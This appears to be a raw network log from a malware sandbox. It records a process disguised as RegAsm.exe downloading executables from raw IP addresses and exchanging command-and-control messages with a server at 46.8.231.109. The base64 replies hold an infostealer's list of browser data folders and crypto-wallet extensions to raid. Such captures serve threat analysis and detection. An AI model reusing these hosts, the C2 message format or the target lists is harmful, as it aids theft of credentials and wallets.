Sep 4, 2024 17:37:18.485140085 CEST	230	OUT	GET /yuop/66d60cd3ce002_SeparatelyDied.exe#sun HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:18.670074940 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:18 GMT Content-Type: application/octet-stream Content-Length: 1760552 Last-Modified: Mon, 02 Sep 2024 19:06:59 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d60cd3-1add28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 4b 5a 65 25 2a 34 36 25 2a 34 36 25 2a 34 36 2c 52 b7 36 26 2a 34 36 2c 52 a7 36 34 2a 34 36 25 2a 35 36 89 2a 34 36 3e b7 9e 36 2b 2a 34 36 3e b7 ae 36 24 2a 34 36 3e b7 a9 36 24 2a 34 36 52 69 63 68 25 2a 34 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cf e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 70 00 00 00 da 3e 00 00 42 00 00 99 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 bd 87 1b 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aKZe%46%46%46,R6&46,R6446%5646>6+46>6$46>6$46Rich%46PELGOp>B8@pL@40G Q?H.textop `.rdatab,t@@.dataf>@.ndata ?.rsrc0G@@.reloc20L4@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49718	31.41.244.9	80	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:05.177768946 CEST	202	OUT	HEAD /nokia/lamp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 31.41.244.9 Cache-Control: no-cache
Sep 4, 2024 17:37:15.085519075 CEST	269	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 04 Sep 2024 15:37:14 GMT Content-Type: application/octet-stream Content-Length: 1776640 Last-Modified: Wed, 04 Sep 2024 13:30:25 GMT Connection: keep-alive ETag: "66d860f1-1b1c00" Accept-Ranges: bytes
Sep 4, 2024 17:37:15.085889101 CEST	201	OUT	GET /nokia/lamp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 31.41.244.9 Cache-Control: no-cache
Sep 4, 2024 17:37:15.399673939 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 04 Sep 2024 15:37:15 GMT Content-Type: application/octet-stream Content-Length: 1776640 Last-Modified: Wed, 04 Sep 2024 13:30:25 GMT Connection: keep-alive ETag: "66d860f1-1b1c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 70 67 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 67 00 00 04 00 00 bb fd 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELMfB"pg@g@P#d# #<@.rsrc #L@.idata #L@ )$N@tmvaidtcMP@vymybyyn`g@.taggant0pg"@
Sep 4, 2024 17:37:15.399736881 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 4, 2024 17:37:15.399749041 CEST	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 4, 2024 17:37:15.399859905 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 4, 2024 17:37:15.399871111 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: X_?1_xJ>Z<Xa,rG
Sep 4, 2024 17:37:15.399880886 CEST	1236	IN	Data Raw: de c2 68 96 c1 c0 4a ef 54 6a bd 0f 2e 9a a8 5c e1 b3 61 cd 99 80 9c 67 de 3e d7 be fa b4 4a 86 f3 10 ef 91 5b 58 60 75 a1 da 91 aa 72 72 d1 ae dd 98 39 2c 29 fe 91 40 fd e1 9d 66 e2 dd 5c ff 80 9c 8e 54 42 69 9c 66 a3 35 64 64 f8 c2 74 4c fb 90 Data Ascii: hJTj.\ag>J[X`urr9,)@f\TBif5ddtL](ayxnl aT4>KZ$#5g `@m@NfpM_P6"KbX8i`k\|M DTj<^FHmQ_:If5Yc\
Sep 4, 2024 17:37:15.399900913 CEST	1236	IN	Data Raw: 48 98 1d 9a b6 64 74 d3 c1 a6 9d 6b c6 c0 fa f8 8b 5f d3 9f 24 71 d5 e8 c4 9a dc af 62 d9 7b 0c de db c4 af 1b 6a 8e f4 f6 9a 95 6b 8d 58 de 6b 1c 68 66 ad c8 6c cf 46 c9 0d a9 55 8b 95 73 e2 b9 cd 5e c6 bb 78 d3 b0 50 20 2d d2 a0 8a 96 5c 8b 82 Data Ascii: Hdtk_$qb{jkXkhflFUs^xP -\TbgP?wbpquyetMb8Haxn[`Z1gqEs3&YBfoxl]hC`@X]qAK'kn_3Ao0s\|[Qxp
Sep 4, 2024 17:37:15.400105953 CEST	1236	IN	Data Raw: 48 dc 93 05 df b4 bd 23 55 60 65 0a fd e6 be 06 ca 78 6d 02 bb 71 2c 70 2d 74 ec aa 80 c9 10 63 dd a6 60 0f e2 b4 65 f2 d8 bc d6 82 d1 68 7c e6 fb 47 21 aa f3 6b 74 9a d1 9a 9c 7f e2 a2 91 23 1d 60 65 ce fc 69 bd f2 82 aa 7e da c9 e8 54 56 ff 71 Data Ascii: H#U`exmq,p-tc`eh\|G!kt#`ei~TVqsQw^=0typ~]4e,'H~Dw~q(q\W;w<$epynHc@$fpaC!m$xA{`KFDf}aNwR,HqoL~
Sep 4, 2024 17:37:15.400115967 CEST	1236	IN	Data Raw: 67 e4 ef 77 9c 7a ea 97 98 9a b0 7d fa b1 50 77 74 7a d1 97 78 60 4e ee cb d9 65 3e c1 c4 da a0 5c 60 ab c6 b0 9a a4 93 dc ab bd 56 82 68 52 c6 70 9c 81 1e 3d 9f 86 73 24 22 ca 7f 9c 6c 14 78 db 79 dc 2a 52 bc 1c 67 90 dc 93 66 e1 e4 65 6e 98 e0 Data Ascii: gwz}Pwtzx`Ne>\`VhRp=s$"lxyRgfen4f}r<PU4GSCD8"`e s\|e<qqoth:'T<t#De. ^l$c4UwAlx;4R6\|xqnfqntLMr
Sep 4, 2024 17:37:15.400125980 CEST	1236	IN	Data Raw: 2b d8 d1 a9 33 68 41 78 d9 48 5e f3 97 b9 5f b7 c4 f6 90 91 98 43 5f da f3 ea 15 77 00 9d d5 0e 8f 7c af cf ec 22 59 76 fc 9e cc 49 cb a2 84 ce 83 de 8e 4e ca b8 93 81 e9 10 9d 90 10 e8 73 39 e2 f8 da 91 ff 70 72 d2 10 1a a9 a1 df 3c a5 e6 b7 5b Data Ascii: +3hAxH^_C_w\|"YvINs9pr<['_ln-,Dqi,G\Y4wpia~_4`Mehs`yp##e04nj@$wTA]Y]ztwDOu$JYqfH(t\HqoK:e\
Sep 4, 2024 17:37:15.400134087 CEST	108	IN	Data Raw: 6d 60 e8 2a 76 00 e2 a6 1c aa 02 4b db 9d 49 8b b0 03 e3 e8 7a a8 5c 52 3e d8 f8 1d 49 a3 91 52 cb 61 27 f8 65 d8 54 8e 42 03 26 b5 83 6a c0 c4 d3 94 a2 9b df 79 00 ef 2c e0 55 0a 79 7a 9b 4d c3 79 f1 a2 44 8a b4 6e 99 ad ce 60 50 48 17 8b 5c b4 Data Ascii: m`*vKIz\R>IRa'eTB&jy,UyzMyDn`PH\n3w`1n41

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49720	154.216.17.178	80	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:05.177897930 CEST	215	OUT	HEAD /edge/msconfig32.exe#pend HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 154.216.17.178 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49722	76.76.21.98	80	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:05.186450005 CEST	183	OUT	Data Raw: 16 03 03 00 b2 01 00 00 ae 03 03 66 d8 7e 9f bd 60 d2 48 e6 a3 de bc 83 ca 00 5a f9 d9 1d 3f 6a 90 7a 86 4c 14 86 c5 39 89 85 ea 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f~`HZ?jzL9&,+0/$#('=<5/_file-link-iota.vercel.app#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49723	76.76.21.98	80	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:05.668225050 CEST	129	OUT	Data Raw: 16 03 01 00 7c 01 00 00 78 03 01 66 d8 7e a0 83 65 14 fb 7f a8 57 d8 57 d3 55 96 1d af b7 93 64 aa fb b4 b7 09 97 cd 47 b5 0e d4 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 41 00 00 00 1e 00 1c 00 00 19 66 69 6c 65 2d 6c 69 6e 6b Data Ascii: \|xf~eWWUdG5/Afile-link-iota.vercel.app#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49726	154.216.17.178	80	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:07.084120035 CEST	214	OUT	GET /edge/msconfig32.exe#pend HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 154.216.17.178 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49730	176.111.174.109	80	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:15.075110912 CEST	195	OUT	GET /bobr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 176.111.174.109 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	53026	46.8.231.109	80	2800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:30.296899080 CEST	87	OUT	GET / HTTP/1.1 Host: 46.8.231.109 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:37:30.848460913 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 4, 2024 17:37:30.949732065 CEST	413	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBA Host: 46.8.231.109 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 42 43 34 44 36 34 38 39 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="hwid"62BC4D6489FB4109353171------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="build"default------DGHIDAFCGIEHIEBFCFBA--
Sep 4, 2024 17:37:32.402935028 CEST	407	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:31 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4f 47 49 34 59 6d 56 6b 4e 6d 4e 68 4f 54 59 31 5a 54 67 34 4e 6a 51 35 4d 7a 42 68 59 7a 67 34 4d 6d 55 31 5a 6a 68 6b 59 54 64 68 4d 44 4d 77 59 32 4d 35 4f 57 5a 6c 5a 44 51 35 4d 47 4e 6b 5a 47 55 7a 5a 6d 49 35 4f 54 4d 7a 4e 54 4d 78 4e 47 59 33 4d 44 6b 79 4f 44 67 32 4e 57 59 79 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: OGI4YmVkNmNhOTY1ZTg4NjQ5MzBhYzg4MmU1ZjhkYTdhMDMwY2M5OWZlZDQ5MGNkZGUzZmI5OTMzNTMxNGY3MDkyODg2NWYyfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 4, 2024 17:37:32.662264109 CEST	467	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH Host: 46.8.231.109 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"browsers------HIDAKFIJJKJJJKEBKJEH--
Sep 4, 2024 17:37:32.844875097 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 4, 2024 17:37:32.844897032 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 4, 2024 17:37:32.884954929 CEST	466	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGH Host: 46.8.231.109 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="message"plugins------IJDGIIEBFCBAAAAKKEGH--
Sep 4, 2024 17:37:33.072029114 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY